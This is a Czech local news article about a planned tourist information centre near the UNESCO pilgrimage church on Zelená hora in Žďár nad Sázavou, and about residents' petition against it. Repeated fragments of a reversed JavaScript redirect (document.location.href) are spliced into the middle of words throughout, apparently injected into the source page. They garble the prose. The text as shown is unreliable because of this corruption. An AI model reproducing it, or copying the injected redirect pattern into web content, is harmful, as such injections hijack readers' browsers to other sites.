Rainbow page separator

Infocentrum pro turisty pod Zelenou horou je ve fázi hodnocení

Pátek, 31. prosince 2021

Žďár nad Sázavou / Ve fázi hodnocení se aktuálně nachází návrhy na vybudování informačního centra pod Zelenou horou. Prodloužený termín architek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonické soutěže, kterou měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to účelu vyhlásilo, vypršel 20. prosince. Cílem infocentra určeného pro poutní kostel svatého Jana Nepomuckého, památky UNESCO, je zajistit chybějící zázemí pro návštěvníky i zaměstnance. Zadávací dokumentace architek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonické soutěže předpokládá umístění infocentra se zázemím, sociálním zařízením pro turisty i personál, pokladnou a občerstvením na pozemku města naproti odbočce z ulice Sychrovy do ulice Vejmluvovy. Výstavbu by financovala tamní farnost prostřednictvím Biskupství brněnského, žďárská radnice by v té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to souvislosti uhradila navazující infrastrukturu v podobě parkovacích míst a zálivu pro au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tobusy včetně nové zastávky městské hromadné dopravy (MHD), jež by nahradila nevyhovující zastávku MHD Sychrova.
Připravovaný záměr se nezamlouvá zejména lidem žijícím v sousedství plánovaného centra, kteří se vůči němu ohradili peticí. Obávají se negativního ovlivnění krajinného rázu Zelené hory jako celku i zhoršení kvality bydlení a dopravní situace v ulicích Vejmluvova, Sychrova a Zelenohorská. Také nelibě nesli, že diskuse s obyvateli lokality neproběhla ještě před vyhlášením soutěže. Zástupci města naopak zastávají názor, že právě architek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tonická soutěž má vytvořit konkrétní představu umístění zařízení v souvislosti s dopravou, parkováním a logistikou, z níž je poté možné vycházet. Soutěž měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vyjde na půl milionu korun, přičemž farnost a Kraj Vysočina uhradí po s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tisících.